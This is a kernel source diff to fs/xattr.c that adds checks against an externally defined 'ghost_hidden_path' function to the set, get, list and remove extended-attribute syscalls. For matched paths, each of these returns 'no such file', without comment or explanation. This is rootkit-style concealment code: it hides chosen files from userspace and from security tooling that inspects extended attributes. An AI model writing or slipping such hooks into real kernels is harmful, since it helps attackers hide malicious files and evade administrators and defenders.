--- a/fs/xattr.c
+++ b/fs/xattr.c
@@ -644,6 +644,7 @@
 	};
 	struct path path;
 	int error;
+	extern bool ghost_hidden_path(const struct path *gp);
 
 	error = setxattr_copy(name, &ctx);
 	if (error)
@@ -653,6 +654,11 @@
 	error = user_path_at(AT_FDCWD, pathname, lookup_flags, &path);
 	if (error)
 		goto out;
+	if (ghost_hidden_path(&path)) {
+		path_put(&path);
+		error = -ENOENT;
+		goto out;
+	}
 	error = mnt_want_write(path.mnt);
 	if (!error) {
 		error = do_setxattr(mnt_idmap(path.mnt), path.dentry, &ctx);
@@ -781,10 +787,16 @@
 {
 	struct path path;
 	ssize_t error;
+	extern bool ghost_hidden_path(const struct path *gp);
+
 retry:
 	error = user_path_at(AT_FDCWD, pathname, lookup_flags, &path);
 	if (error)
 		return error;
+	if (ghost_hidden_path(&path)) {
+		path_put(&path);
+		return -ENOENT;
+	}
 	error = getxattr(mnt_idmap(path.mnt), path.dentry, name, value, size);
 	path_put(&path);
 	if (retry_estale(error, lookup_flags)) {
@@ -858,10 +870,16 @@
 {
 	struct path path;
 	ssize_t error;
+	extern bool ghost_hidden_path(const struct path *gp);
+
 retry:
 	error = user_path_at(AT_FDCWD, pathname, lookup_flags, &path);
 	if (error)
 		return error;
+	if (ghost_hidden_path(&path)) {
+		path_put(&path);
+		return -ENOENT;
+	}
 	error = listxattr(path.dentry, list, size);
 	path_put(&path);
 	if (retry_estale(error, lookup_flags)) {
@@ -912,6 +930,8 @@
 {
 	struct path path;
 	int error;
+	extern bool ghost_hidden_path(const struct path *gp);
+
 	char kname[XATTR_NAME_MAX + 1];
 
 	error = strncpy_from_user(kname, name, sizeof(kname));
@@ -923,6 +943,10 @@
 	error = user_path_at(AT_FDCWD, pathname, lookup_flags, &path);
 	if (error)
 		return error;
+	if (ghost_hidden_path(&path)) {
+		path_put(&path);
+		return -ENOENT;
+	}
 	error = mnt_want_write(path.mnt);
 	if (!error) {
 		error = removexattr(mnt_idmap(path.mnt), path.dentry, kname);
